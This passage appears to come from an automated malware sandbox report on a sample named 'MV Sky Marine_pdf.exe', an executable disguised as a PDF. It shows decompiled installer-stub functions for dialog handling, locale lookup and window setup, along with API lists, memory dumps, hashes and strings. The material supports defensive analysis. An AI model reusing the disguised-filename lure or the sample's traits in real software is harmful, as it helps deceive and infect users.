                                                                                                  					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                                                                  				}
                                                                                                  				 *0x7a2828 =  *0x7a2828 +  *((intOrPtr*)(_t19 - 4));
                                                                                                  				return 0;
                                                                                                  			}


                                                                                                  APIs
                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                   • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: FileFindFirst
                                                                                                  • String ID:
                                                                                                  • API String ID: 1974802433-0
                                                                                                  • Opcode ID: 717546484d7fa15b747944a954efadbd86ff467de9880ad1bb9a4d2a07532cdb
                                                                                                  • Instruction ID: a6a563213af65dfa629204f33aebea20412d031b043e3e21e0a0d93577fd57dd
                                                                                                  • Opcode Fuzzy Hash: 717546484d7fa15b747944a954efadbd86ff467de9880ad1bb9a4d2a07532cdb
                                                                                                  • Instruction Fuzzy Hash: 34F0A0325081049EE702EBA89A499FEB3A8DB11328F60457BE101B21C1C6B849469B3A
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.235472130.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000002.00000002.235453419.0000000010000000.00000002.00020000.sdmp
• Associated: 00000002.00000002.235460951.0000000010001000.00000020.00020000.sdmp
• Associated: 00000002.00000002.235467539.0000000010002000.00000002.00020000.sdmp
• Associated: 00000002.00000002.235488746.0000000010005000.00000002.00020000.sdmp
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.235472130.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000002.00000002.235453419.0000000010000000.00000002.00020000.sdmp
• Associated: 00000002.00000002.235460951.0000000010001000.00000020.00020000.sdmp
• Associated: 00000002.00000002.235467539.0000000010002000.00000002.00020000.sdmp
• Associated: 00000002.00000002.235488746.0000000010005000.00000002.00020000.sdmp
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 84%
                                                                                                  			E00403B0D(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                                                                  				struct HWND__* _v32;
                                                                                                  				void* _v84;
                                                                                                  				void* _v88;
                                                                                                  				void* __ebx;
                                                                                                  				void* __edi;
                                                                                                  				void* __esi;
                                                                                                  				signed int _t35;
                                                                                                  				signed int _t37;
                                                                                                  				signed int _t39;
                                                                                                  				struct HWND__* _t49;
                                                                                                  				signed int _t67;
                                                                                                  				struct HWND__* _t73;
                                                                                                  				signed int _t86;
                                                                                                  				struct HWND__* _t91;
                                                                                                  				signed int _t99;
                                                                                                  				int _t103;
                                                                                                  				signed int _t115;
                                                                                                  				signed int _t116;
                                                                                                  				int _t117;
                                                                                                  				signed int _t122;
                                                                                                  				struct HWND__* _t125;
                                                                                                  				struct HWND__* _t126;
                                                                                                  				int _t127;
                                                                                                  				long _t130;
                                                                                                  				int _t132;
                                                                                                  				int _t133;
                                                                                                  				void* _t134;
                                                                                                  				void* _t142;
                                                                                                  
                                                                                                  				_t115 = _a8;
                                                                                                  				if(_t115 == 0x110 || _t115 == 0x408) {
                                                                                                  					_t35 = _a12;
                                                                                                  					_t125 = _a4;
                                                                                                  					__eflags = _t115 - 0x110;
                                                                                                  					 *0x79ed84 = _t35;
                                                                                                  					if(_t115 == 0x110) {
                                                                                                  						 *0x7a27a8 = _t125;
                                                                                                  						 *0x79ed98 = GetDlgItem(_t125, 1);
                                                                                                  						_t91 = GetDlgItem(_t125, 2);
                                                                                                  						_push(0xffffffff);
                                                                                                  						_push(0x1c);
                                                                                                  						 *0x79dd60 = _t91;
                                                                                                  						E00403FE0(_t125);
                                                                                                  						SetClassLongA(_t125, 0xfffffff2,  *0x7a1f88);
                                                                                                  						 *0x7a1f6c = E0040140B(4);
                                                                                                  						_t35 = 1;
                                                                                                  						__eflags = 1;
                                                                                                  						 *0x79ed84 = 1;
                                                                                                  					}
                                                                                                  					_t122 =  *0x4091cc; // 0xffffffff
                                                                                                  					_t133 = 0;
                                                                                                  					_t130 = (_t122 << 6) +  *0x7a27c0;
                                                                                                  					__eflags = _t122;
                                                                                                  					if(_t122 < 0) {
                                                                                                  						L34:
                                                                                                  						E0040402C(0x40b);
                                                                                                  						while(1) {
                                                                                                  							_t37 =  *0x79ed84;
                                                                                                  							 *0x4091cc =  *0x4091cc + _t37;
                                                                                                  							_t130 = _t130 + (_t37 << 6);
                                                                                                  							_t39 =  *0x4091cc; // 0xffffffff
                                                                                                  							__eflags = _t39 -  *0x7a27c4;
                                                                                                  							if(_t39 ==  *0x7a27c4) {
                                                                                                  								E0040140B(1);
                                                                                                  							}
                                                                                                  							__eflags =  *0x7a1f6c - _t133; // 0x0
                                                                                                  							if(__eflags != 0) {
                                                                                                  								break;
                                                                                                  							}
                                                                                                  							__eflags =  *0x4091cc -  *0x7a27c4; // 0xffffffff
                                                                                                  							if(__eflags >= 0) {
                                                                                                  								break;
                                                                                                  							}
                                                                                                  							_t116 =  *(_t130 + 0x14);
                                                                                                  							E00405D46(_t116, _t125, _t130, 0x7aa800,  *((intOrPtr*)(_t130 + 0x24)));
                                                                                                  							_push( *((intOrPtr*)(_t130 + 0x20)));
                                                                                                  							_push(0xfffffc19);
                                                                                                  							E00403FE0(_t125);
                                                                                                  							_push( *((intOrPtr*)(_t130 + 0x1c)));
                                                                                                  							_push(0xfffffc1b);
                                                                                                  							E00403FE0(_t125);
                                                                                                  							_push( *((intOrPtr*)(_t130 + 0x28)));
                                                                                                  							_push(0xfffffc1a);
                                                                                                  							E00403FE0(_t125);
                                                                                                  							_t49 = GetDlgItem(_t125, 3);
                                                                                                  							__eflags =  *0x7a282c - _t133;
                                                                                                  							_v32 = _t49;
                                                                                                  							if( *0x7a282c != _t133) {
                                                                                                  								_t116 = _t116 & 0x0000fefd | 0x00000004;
                                                                                                  								__eflags = _t116;
                                                                                                  							}
                                                                                                  							ShowWindow(_t49, _t116 & 0x00000008);
                                                                                                  							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
                                                                                                  							E00404002(_t116 & 0x00000002);
                                                                                                  							_t117 = _t116 & 0x00000004;
                                                                                                  							EnableWindow( *0x79dd60, _t117);
                                                                                                  							__eflags = _t117 - _t133;
                                                                                                  							if(_t117 == _t133) {
                                                                                                  								_push(1);
                                                                                                  							} else {
                                                                                                  								_push(_t133);
                                                                                                  							}
                                                                                                  							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
                                                                                                  							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
                                                                                                  							__eflags =  *0x7a282c - _t133;
                                                                                                  							if( *0x7a282c == _t133) {
                                                                                                  								_push( *0x79ed98);
                                                                                                  							} else {
                                                                                                  								SendMessageA(_t125, 0x401, 2, _t133);
                                                                                                  								_push( *0x79dd60);
                                                                                                  							}
                                                                                                  							E00404015();
                                                                                                  							E00405D24(0x79eda0, 0x7a1fa0);
                                                                                                  							E00405D46(0x79eda0, _t125, _t130,  &(0x79eda0[lstrlenA(0x79eda0)]),  *((intOrPtr*)(_t130 + 0x18)));
                                                                                                  							SetWindowTextA(_t125, 0x79eda0);
                                                                                                  							_push(_t133);
                                                                                                  							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
                                                                                                  							__eflags = _t67;
                                                                                                  							if(_t67 != 0) {
                                                                                                  								continue;
                                                                                                  							} else {
                                                                                                  								__eflags =  *_t130 - _t133;
                                                                                                  								if( *_t130 == _t133) {
                                                                                                  									continue;
                                                                                                  								}
                                                                                                  								__eflags =  *(_t130 + 4) - 5;
                                                                                                  								if( *(_t130 + 4) != 5) {
                                                                                                  									DestroyWindow( *0x7a1f78);
                                                                                                  									 *0x79e570 = _t130;
                                                                                                  									__eflags =  *_t130 - _t133;
                                                                                                  									if( *_t130 <= _t133) {
                                                                                                  										goto L58;
                                                                                                  									}
                                                                                                  									_t73 = CreateDialogParamA( *0x7a27a0,  *_t130 +  *0x7a1f80 & 0x0000ffff, _t125,  *(0x4091d0 +  *(_t130 + 4) * 4), _t130);
                                                                                                  									__eflags = _t73 - _t133;
                                                                                                  									 *0x7a1f78 = _t73;
                                                                                                  									if(_t73 == _t133) {
                                                                                                  										goto L58;
                                                                                                  									}
                                                                                                  									_push( *((intOrPtr*)(_t130 + 0x2c)));
                                                                                                  									_push(6);
                                                                                                  									E00403FE0(_t73);
                                                                                                  									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
                                                                                                  									ScreenToClient(_t125, _t134 + 0x10);
                                                                                                  									SetWindowPos( *0x7a1f78, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
                                                                                                  									_push(_t133);
                                                                                                  									E00401389( *((intOrPtr*)(_t130 + 0xc)));
                                                                                                  									__eflags =  *0x7a1f6c - _t133; // 0x0
                                                                                                  									if(__eflags != 0) {
                                                                                                  										goto L61;
                                                                                                  									}
                                                                                                  									ShowWindow( *0x7a1f78, 8);
                                                                                                  									E0040402C(0x405);
                                                                                                  									goto L58;
                                                                                                  								}
                                                                                                  								__eflags =  *0x7a282c - _t133;
                                                                                                  								if( *0x7a282c != _t133) {
                                                                                                  									goto L61;
                                                                                                  								}
                                                                                                  								__eflags =  *0x7a2820 - _t133;
                                                                                                  								if( *0x7a2820 != _t133) {
                                                                                                  									continue;
                                                                                                  								}
                                                                                                  								goto L61;
                                                                                                  							}
                                                                                                  						}
                                                                                                  						DestroyWindow( *0x7a1f78);
                                                                                                  						 *0x7a27a8 = _t133;
                                                                                                  						EndDialog(_t125,  *0x79e168);
                                                                                                  						goto L58;
                                                                                                  					} else {
                                                                                                  						__eflags = _t35 - 1;
                                                                                                  						if(_t35 != 1) {
                                                                                                  							L33:
                                                                                                  							__eflags =  *_t130 - _t133;
                                                                                                  							if( *_t130 == _t133) {
                                                                                                  								goto L61;
                                                                                                  							}
                                                                                                  							goto L34;
                                                                                                  						}
                                                                                                  						_push(0);
                                                                                                  						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
                                                                                                  						__eflags = _t86;
                                                                                                  						if(_t86 == 0) {
                                                                                                  							goto L33;
                                                                                                  						}
                                                                                                  						SendMessageA( *0x7a1f78, 0x40f, 0, 1);
                                                                                                  						__eflags =  *0x7a1f6c - _t133; // 0x0
                                                                                                  						return 0 | __eflags == 0x00000000;
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					_t125 = _a4;
                                                                                                  					_t133 = 0;
                                                                                                  					if(_t115 == 0x47) {
						SetWindowPos( *0x79ed78, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x79ed78,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00404047(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x7a1f78, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x7a282c - _t133;
										if( *0x7a282c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x79e168 = 1;
											L21:
											_push(0x78);
											L22:
											E00403FB9();
											goto L26;
										}
										E0040140B(_t127);
										 *0x79e168 = _t127;
										goto L21;
									}
									__eflags =  *0x4091cc - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x7a1f78);
						 *0x7a1f78 = _a12;
						L58:
						if( *0x79fda0 == _t133) {
							_t142 =  *0x7a1f78 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x79fda0 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}
                                                                                                  0x00403f90
                                                                                                  0x00403f92
                                                                                                  0x00403f98
                                                                                                  0x00403f9d
                                                                                                  0x00403fa3
                                                                                                  0x00403fa3
                                                                                                  0x00403f98
                                                                                                  0x00403fad
                                                                                                  0x00000000
                                                                                                  0x00403fad
                                                                                                  0x00403b72

                                                                                                  APIs
                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B49
                                                                                                  • ShowWindow.USER32(?), ref: 00403B66
                                                                                                  • DestroyWindow.USER32 ref: 00403B7A
                                                                                                  • SetWindowLongA.USER32 ref: 00403B96
                                                                                                  • GetDlgItem.USER32 ref: 00403BB7
                                                                                                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BCB
                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403BD2
                                                                                                  • GetDlgItem.USER32 ref: 00403C80
                                                                                                  • GetDlgItem.USER32 ref: 00403C8A
                                                                                                  • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403CA4
                                                                                                  • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403CF5
                                                                                                  • GetDlgItem.USER32 ref: 00403D9B
                                                                                                  • ShowWindow.USER32(00000000,?), ref: 00403DBC
                                                                                                  • EnableWindow.USER32(?,?), ref: 00403DCE
                                                                                                  • EnableWindow.USER32(?,?), ref: 00403DE9
                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403DFF
                                                                                                  • EnableMenuItem.USER32 ref: 00403E06
                                                                                                  • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E1E
                                                                                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E31
                                                                                                  • lstrlenA.KERNEL32(0079EDA0,?,0079EDA0,007A1FA0), ref: 00403E5A
                                                                                                  • SetWindowTextA.USER32(?,0079EDA0), ref: 00403E69
                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 00403F9D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 184305955-0
                                                                                                  • Opcode ID: 711034cc0416762a8bb21ed1dd30b11ec8ca8cd0f2e427e3bab098090aeff2ca
                                                                                                  • Instruction ID: 50bbb195071ba9e6e5512fce667893bd854c38d79f7330084b3933dc81b42d7b
                                                                                                  • Opcode Fuzzy Hash: 711034cc0416762a8bb21ed1dd30b11ec8ca8cd0f2e427e3bab098090aeff2ca
                                                                                                  • Instruction Fuzzy Hash: 87C18F71904205AFEB216F61ED85E2A3ABCEB85706F00453FF601B51E1C73DA942DB6E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 96%
                                                                                                  			E00403777(void* __eflags) {
                                                                                                  				intOrPtr _v4;
                                                                                                  				intOrPtr _v8;
                                                                                                  				int _v12;
                                                                                                  				int _v16;
                                                                                                  				char _v20;
                                                                                                  				void* __ebx;
                                                                                                  				void* __edi;
                                                                                                  				void* __esi;
                                                                                                  				intOrPtr* _t20;
                                                                                                  				void* _t28;
                                                                                                  				void* _t30;
                                                                                                  				int _t31;
                                                                                                  				void* _t34;
                                                                                                  				int _t37;
                                                                                                  				int _t38;
                                                                                                  				intOrPtr _t39;
                                                                                                  				int _t42;
                                                                                                  				char _t62;
                                                                                                  				CHAR* _t64;
                                                                                                  				signed char _t68;
                                                                                                  				CHAR* _t79;
                                                                                                  				intOrPtr _t81;
                                                                                                  				CHAR* _t85;
                                                                                                  
                                                                                                  				_t81 =  *0x7a27b0;
                                                                                                  				_t20 = E004060B4(3);
                                                                                                  				_t88 = _t20;
                                                                                                  				if(_t20 == 0) {
                                                                                                  					_t79 = 0x79eda0;
                                                                                                  					"1033" = 0x7830;
                                                                                                  					E00405C0B(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x79eda0, 0);
                                                                                                  					__eflags =  *0x79eda0;
                                                                                                  					if(__eflags == 0) {
                                                                                                  						E00405C0B(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407342, 0x79eda0, 0);
                                                                                                  					}
                                                                                                  					lstrcatA("1033", _t79);
                                                                                                  				} else {
                                                                                                  					E00405C82("1033",  *_t20() & 0x0000ffff);
                                                                                                  				}
                                                                                                  				E00403A40(_t76, _t88);
                                                                                                  				 *0x7a2820 =  *0x7a27b8 & 0x00000020;
                                                                                                  				 *0x7a283c = 0x10000;
                                                                                                  				if(E004058F8(_t88, 0x7a8400) != 0) {
                                                                                                  					L16:
                                                                                                  					if(E004058F8(_t96, 0x7a8400) == 0) {
                                                                                                  						E00405D46(0, _t79, _t81, 0x7a8400,  *((intOrPtr*)(_t81 + 0x118)));
                                                                                                  					}
                                                                                                  					_t28 = LoadImageA( *0x7a27a0, 0x67, 1, 0, 0, 0x8040);
                                                                                                  					 *0x7a1f88 = _t28;
                                                                                                  					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
                                                                                                  						L21:
                                                                                                  						if(E0040140B(0) == 0) {
                                                                                                  							_t30 = E00403A40(_t76, __eflags);
                                                                                                  							__eflags =  *0x7a2840;
                                                                                                  							if( *0x7a2840 != 0) {
                                                                                                  								_t31 = E004050E2(_t30, 0);
                                                                                                  								__eflags = _t31;
                                                                                                  								if(_t31 == 0) {
                                                                                                  									E0040140B(1);
                                                                                                  									goto L33;
                                                                                                  								}
                                                                                                  								__eflags =  *0x7a1f6c; // 0x0
                                                                                                  								if(__eflags == 0) {
                                                                                                  									E0040140B(2);
                                                                                                  								}
                                                                                                  								goto L22;
                                                                                                  							}
                                                                                                  							ShowWindow( *0x79ed78, 5);
                                                                                                  							_t37 = E00406046("RichEd20");
                                                                                                  							__eflags = _t37;
                                                                                                  							if(_t37 == 0) {
                                                                                                  								E00406046("RichEd32");
                                                                                                  							}
                                                                                                  							_t85 = "RichEdit20A";
                                                                                                  							_t38 = GetClassInfoA(0, _t85, 0x7a1f40);
                                                                                                  							__eflags = _t38;
                                                                                                  							if(_t38 == 0) {
                                                                                                  								GetClassInfoA(0, "RichEdit", 0x7a1f40);
                                                                                                  								 *0x7a1f64 = _t85;
                                                                                                  								RegisterClassA(0x7a1f40);
                                                                                                  							}
                                                                                                  							_t39 =  *0x7a1f80; // 0x0
                                                                                                  							_t42 = DialogBoxParamA( *0x7a27a0, _t39 + 0x00000069 & 0x0000ffff, 0, E00403B0D, 0);
                                                                                                  							E004036C7(E0040140B(5), 1);
                                                                                                  							return _t42;
                                                                                                  						}
                                                                                                  						L22:
                                                                                                  						_t34 = 2;
                                                                                                  						return _t34;
                                                                                                  					} else {
                                                                                                  						_t76 =  *0x7a27a0;
                                                                                                  						 *0x7a1f54 = _t28;
                                                                                                  						_v20 = 0x624e5f;
                                                                                                  						 *0x7a1f44 = E00401000;
                                                                                                  						 *0x7a1f50 =  *0x7a27a0;
                                                                                                  						 *0x7a1f64 =  &_v20;
                                                                                                  						if(RegisterClassA(0x7a1f40) == 0) {
                                                                                                  							L33:
                                                                                                  							__eflags = 0;
                                                                                                  							return 0;
                                                                                                  						}
                                                                                                  						_t12 =  &_v16; // 0x624e5f
                                                                                                  						SystemParametersInfoA(0x30, 0, _t12, 0);
                                                                                                  						 *0x79ed78 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a27a0, 0);
                                                                                                  						goto L21;
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					_t76 =  *(_t81 + 0x48);
                                                                                                  					if(_t76 == 0) {
                                                                                                  						goto L16;
                                                                                                  					}
                                                                                                  					_t79 = 0x7a1740;
                                                                                                  					E00405C0B( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) +  *0x7a27d8, 0x7a1740, 0);
                                                                                                  					_t62 =  *0x7a1740; // 0x48
                                                                                                  					if(_t62 == 0) {
                                                                                                  						goto L16;
                                                                                                  					}
                                                                                                  					if(_t62 == 0x22) {
                                                                                                  						_t79 = 0x7a1741;
                                                                                                  						 *((char*)(E00405842(0x7a1741, 0x22))) = 0;
                                                                                                  					}
                                                                                                  					_t64 = lstrlenA(_t79) + _t79 - 4;
                                                                                                  					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
                                                                                                  						L15:
                                                                                                  						E00405D24(0x7a8400, E00405817(_t79));
                                                                                                  						goto L16;
                                                                                                  					} else {
                                                                                                  						_t68 = GetFileAttributesA(_t79);
                                                                                                  						if(_t68 == 0xffffffff) {
                                                                                                  							L14:
                                                                                                  							E0040585E(_t79);
                                                                                                  							goto L15;
                                                                                                  						}
                                                                                                  						_t96 = _t68 & 0x00000010;
                                                                                                  						if((_t68 & 0x00000010) != 0) {
                                                                                                  							goto L15;
                                                                                                  						}
                                                                                                  						goto L14;
                                                                                                  					}
                                                                                                  				}
                                                                                                  			}
                                                                                                  0x004039d4
                                                                                                  0x004039d4
                                                                                                  0x004039da
                                                                                                  0x004039f3
                                                                                                  0x00403a04
                                                                                                  0x00000000
                                                                                                  0x00403a09
                                                                                                  0x00403971
                                                                                                  0x00403973
                                                                                                  0x00000000
                                                                                                  0x004038de
                                                                                                  0x004038de
                                                                                                  0x004038e4
                                                                                                  0x004038ee
                                                                                                  0x004038f6
                                                                                                  0x00403900
                                                                                                  0x00403906
                                                                                                  0x00403914
                                                                                                  0x00403a36
                                                                                                  0x00403a36
                                                                                                  0x00000000
                                                                                                  0x00403a36
                                                                                                  0x0040391a
                                                                                                  0x00403923
                                                                                                  0x00403962
                                                                                                  0x00000000
                                                                                                  0x00403962
                                                                                                  0x0040381c
                                                                                                  0x0040381c
                                                                                                  0x00403821
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x0040382b
                                                                                                  0x0040383b
                                                                                                  0x00403840
                                                                                                  0x00403847
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x0040384b
                                                                                                  0x0040384d
                                                                                                  0x0040385a
                                                                                                  0x0040385a
                                                                                                  0x00403862
                                                                                                  0x00403868
                                                                                                  0x00403890
                                                                                                  0x00403898
                                                                                                  0x00000000
                                                                                                  0x0040387a
                                                                                                  0x0040387b
                                                                                                  0x00403884
                                                                                                  0x0040388a
                                                                                                  0x0040388b
                                                                                                  0x00000000
                                                                                                  0x0040388b
                                                                                                  0x00403886
                                                                                                  0x00403888
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00403888
                                                                                                  0x00403868

                                                                                                  APIs
                                                                                                    • Part of subcall function 004060B4: GetModuleHandleA.KERNEL32(?,?,?,004032D9,0000000D), ref: 004060C6
                                                                                                    • Part of subcall function 004060B4: GetProcAddress.KERNEL32(00000000,?), ref: 004060E1
                                                                                                  • lstrcatA.KERNEL32(1033,0079EDA0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079EDA0,00000000,00000003,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\MV Sky Marine_pdf.exe" ,00000000), ref: 004037E8
                                                                                                  • lstrlenA.KERNEL32(HfkcdoekxlzOjbt,?,?,?,HfkcdoekxlzOjbt,00000000,007A8400,1033,0079EDA0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079EDA0,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 0040385D
                                                                                                  • lstrcmpiA.KERNEL32(?,.exe,HfkcdoekxlzOjbt,?,?,?,HfkcdoekxlzOjbt,00000000,007A8400,1033,0079EDA0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079EDA0,00000000), ref: 00403870
                                                                                                  • GetFileAttributesA.KERNEL32(HfkcdoekxlzOjbt), ref: 0040387B
                                                                                                  • LoadImageA.USER32 ref: 004038C4
                                                                                                    • Part of subcall function 00405C82: wsprintfA.USER32 ref: 00405C8F
                                                                                                  • RegisterClassA.USER32 ref: 0040390B
                                                                                                  • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403923
                                                                                                  • CreateWindowExA.USER32 ref: 0040395C
                                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403992
                                                                                                  • GetClassInfoA.USER32 ref: 004039BE
                                                                                                  • GetClassInfoA.USER32 ref: 004039CB
                                                                                                  • RegisterClassA.USER32 ref: 004039D4
                                                                                                  • DialogBoxParamA.USER32 ref: 004039F3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                  • String ID: "C:\Users\user\Desktop\MV Sky Marine_pdf.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$HfkcdoekxlzOjbt$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                  • API String ID: 1975747703-438579894
                                                                                                  • Opcode ID: eb4441e4377b0bf268c748af4bc558b8a08e83df4cbc82606365b058a02161bf
                                                                                                  • Instruction ID: 35a926fb0ff1dca2a59ab2be640b96e9f44767dc488af4120bbc7542c0b7b188
                                                                                                  • Opcode Fuzzy Hash: eb4441e4377b0bf268c748af4bc558b8a08e83df4cbc82606365b058a02161bf
                                                                                                  • Instruction Fuzzy Hash: 6161B3B16442406EE710BF659C45E3B3AACEB85749F40847FF945B22E2D77C9D01CA2E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 93%
                                                                                                  			// Dialog procedure: _a4 = hwndDlg, _a8 = uMsg, _a12 = wParam, _a16 = lParam.
                                                                                                  			// Win32 message, notification and control constants are annotated with their names.
                                                                                                  			// The shape (RichEdit text box 1000 fed by EM_STREAMIN, EN_LINK -> ShellExecuteA,
                                                                                                  			// Enter/Escape mapped to IDOK/WM_CLOSE) is that of an installer stub's license-page dialog.
                                                                                                  			E00404128(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
